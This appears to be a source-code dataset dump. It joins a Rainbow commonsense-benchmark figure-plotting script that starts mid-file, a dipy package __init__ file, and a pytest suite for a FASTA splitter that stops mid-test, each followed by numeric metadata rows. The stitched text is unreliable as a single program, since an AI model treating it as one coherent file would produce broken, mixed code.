}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="full-task_compare-knowledge-graphs_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["direction", "rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
],
"transferring-multisets": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="full-task_compare-transfer-methods_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
],
"transferring-to-external-tasks": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"commonsenseqa": "CQA",
"joci": "JOCI",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"commonsenseqa": "CQA",
"joci": "JOCI",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": lambda x: {"commonsenseqa": 0, "joci": 1}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": lambda x: {"commonsenseqa": 0, "joci": 1}[x],
},
),
# Make equivalent curves for individual tasks to use in
# illustrating how equivalent curves work.
FigureConfig(
fig_name="learning-curves_task_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size", "task"],
treatment_split_key=["model_size", "task", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_task_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size", "task"],
treatment_split_key=["model_size", "task", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": None,
},
),
],
}
"""Figure configurations for all experiments."""
# main function
@click.command()
@click.argument(
"src", type=click.Path(exists=True, dir_okay=True, file_okay=False)
)
@click.argument(
"dst", type=click.Path(exists=False, dir_okay=True, file_okay=False)
)
def create_multi_experiment_figures(src: str, dst: str) -> None:
"""Create multi-experiment figures for the Rainbow results.
Read in the raw tables from SRC and write out the figures to DST.
"""
utils.configure_logging(clear=True)
for topic, figure_configs in tqdm.tqdm(
TOPIC_TO_FIGURE_CONFIG.items(), **settings.TQDM_KWARGS
):
for config in tqdm.tqdm(figure_configs, **settings.TQDM_KWARGS):
os.makedirs(os.path.join(dst, topic, config.fig_name))
# Read in the data.
control_fpath = os.path.join(src, topic, config.control_fname)
control_data = (
pd.read_csv(control_fpath)
if control_fpath.endswith("csv")
else pd.read_json(control_fpath, lines=True)
)
treatment_fpath = os.path.join(src, topic, config.treatment_fname)
treatment_data = (
pd.read_csv(treatment_fpath)
if treatment_fpath.endswith("csv")
else pd.read_json(treatment_fpath, lines=True)
)
# Max over the hyper-parameters.
treatment_data = (
treatment_data.groupby(
[
col
for col in treatment_data.columns
if col not in config.hyper_param_cols
and col != config.score_col
]
)
.max()[config.score_col]
.reset_index()
)
control_data = (
control_data.groupby(
[
col
for col in control_data.columns
if col not in config.hyper_param_cols
and col != config.score_col
]
)
.max()[config.score_col]
.reset_index()
)
for key, treatment_subdata in treatment_data.groupby(
config.treatment_split_key
):
control_subdata = control_data[
# Select only rows which agree with the current key.
functools.reduce(
operator.and_,
[
control_data[key_name] == key_value
for key_name, key_value in zip(
config.treatment_split_key, key
)
if key_name in config.control_split_key
],
)
]
fig, axes = config.plot_func(
control_data=control_subdata,
treatment_data=treatment_subdata,
score_col=config.score_col,
**config.plot_kwargs,
)
dst_path = os.path.join(
dst,
topic,
config.fig_name,
".".join(list(key) + [config.fig_name, "png"]),
)
fig.savefig(dst_path)
plt.close(fig)
if __name__ == "__main__":
create_multi_experiment_figures() # pylint: disable=no-value-for-parameter
| 37.39851 | 93 | 0.500855 | 5,838 | 60,249 | 4.94433 | 0.069373 | 0.020613 | 0.016629 | 0.027092 | 0.849506 | 0.83797 | 0.828928 | 0.814135 | 0.800589 | 0.796605 | 0 | 0.008307 | 0.386596 | 60,249 | 1,610 | 94 | 37.421739 | 0.772736 | 0.116002 | 0 | 0.794776 | 0 | 0 | 0.230504 | 0.06358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008209 | false | 0 | 0.009701 | 0.000746 | 0.03209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c9fabfe752163ee434d2d74621bef44cff8e4264 | 175 | py | Python | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | 2 | 2018-07-25T14:04:20.000Z | 2021-02-10T07:10:10.000Z | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | null | null | null | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | 2 | 2018-07-24T21:20:54.000Z | 2018-08-27T04:08:24.000Z |
from .probabilistic_direction_getter import ProbabilisticDirectionGetter
from .probabilistic_direction_getter import DeterministicMaximumDirectionGetter
from .peaks import *
| 35 | 79 | 0.902857 | 15 | 175 | 10.266667 | 0.533333 | 0.220779 | 0.337662 | 0.415584 | 0.493506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074286 | 175 | 4 | 80 | 43.75 | 0.950617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
4e43dbd4dfe60d0087ce24575ba24120f81e0061 | 18,738 | py | Python | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | from pathlib import Path
import fastasplitter.exceptions
import fastasplitter.split_fasta_sequences_file
import pytest
import runpy
import sys
def test_when_number_of_arguments_equals_two_then_ok():
number_of_arguments_provided = 2
assert fastasplitter.split_fasta_sequences_file \
.check_if_is_valid_number_of_arguments(number_of_arguments_provided) is None
def test_when_number_of_arguments_not_equals_two_then_throws_invalid_number_of_arguments_exception():
number_of_arguments_provided = 3
with pytest.raises(fastasplitter.exceptions.InvalidNumberofArgumentsError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_is_valid_number_of_arguments(number_of_arguments_provided)
invalid_number_of_arguments_message = "Invalid Number of Arguments Provided! \n" \
"Expected: 1 Argument (FASTA Sequences File). \n" \
"Provided: {0} Argument(s).".format(number_of_arguments_provided - 1)
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidNumberofArgumentsError
assert str(pytest_wrapped_e.value) == invalid_number_of_arguments_message
def test_when_sequences_file_not_exists_then_throws_file_not_found_exception():
inexistent_sequences_file = Path("inexistent_sequences.fasta")
with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_exists(inexistent_sequences_file)
file_not_found_message = "FASTA Sequences File not Found!"
assert pytest_wrapped_e.type == FileNotFoundError
assert str(pytest_wrapped_e.value) == file_not_found_message
def test_when_sequences_file_exists_then_return_sequences_file_extension():
sequences_file_extension_expected = ".fasta"
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
assert sequences_file_extension_returned == sequences_file_extension_expected
temporary_sequences_file.unlink()
def test_when_sequences_file_has_no_fasta_extension_then_throws_invalid_extension_file_exception():
temporary_sequences_file = Path("sequences.txt")
with open(temporary_sequences_file, mode="w"):
pass
with pytest.raises(fastasplitter.exceptions.InvalidExtensionFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_has_fasta_extension(temporary_sequences_file)
invalid_format_file_message = "Only FASTA Extension Files (.fa, .faa, .fasta, .ffn, .fna or .frn) are Allowed!"
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidExtensionFileError
assert str(pytest_wrapped_e.value) == invalid_format_file_message
temporary_sequences_file.unlink()
def test_when_description_line_is_parsed_then_return_description_lines_count():
description_line_count_expected = 1
line = ">ValidDescription1 |text1\n"
sequences_start_token = ">"
description_lines_count_returned = 0
description_lines_count_returned = fastasplitter.split_fasta_sequences_file \
.parse_description_line(line, sequences_start_token, description_lines_count_returned)
assert description_lines_count_returned == description_line_count_expected
def test_when_invalid_description_line_is_parsed_then_return_invalid_description_lines_count():
invalid_description_lines_count_expected = 1
line = "> InvalidDescription1\n"
sequences_start_token = ">"
invalid_description_lines_count_returned = 0
invalid_description_lines_count_returned = fastasplitter.split_fasta_sequences_file \
.parse_invalid_description_line(line, sequences_start_token, invalid_description_lines_count_returned)
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
def test_when_sequences_file_is_parsed_then_return_sequences_file_counter():
description_lines_count_expected = 2
invalid_description_lines_count_expected = 1
lines_count_expected = 4
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("> InvalidDescription1\nAAA\n")
sequences_file.write(">ValidDescription1 |text1\nCCC\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
assert description_lines_count_returned == description_lines_count_expected
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
assert lines_count_returned == lines_count_expected
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_not_any_description_line_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("AAA\n")
sequences_file.write("CCC\n")
sequences_file.write("GGG\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file \
.check_if_sequences_file_has_any_description_line(temporary_sequences_file,
description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Has Not Any Description Line!".format(str(temporary_sequences_file))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_invalid_description_lines_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("> InvalidDescription1\nAAA\n")
sequences_file.write(">ValidDescription1 |text1\nCCC\n")
sequences_file.write(">ValidDescription2|text2\nGGG\n")
sequences_file.write("> InvalidDescription2|text2\nTTT\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file \
.check_if_sequences_file_has_any_invalid_description_line(temporary_sequences_file,
invalid_description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Contains {1} Line(s) With Invalid Description Format!" \
.format(str(temporary_sequences_file), str(2))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_data_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">ValidDescription1\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_has_no_data(temporary_sequences_file,
lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Seems a Empty Fasta File!".format(str(temporary_sequences_file))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_all_valid_lines_then_ok():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">ValidDescription1|text1\nAAA\n")
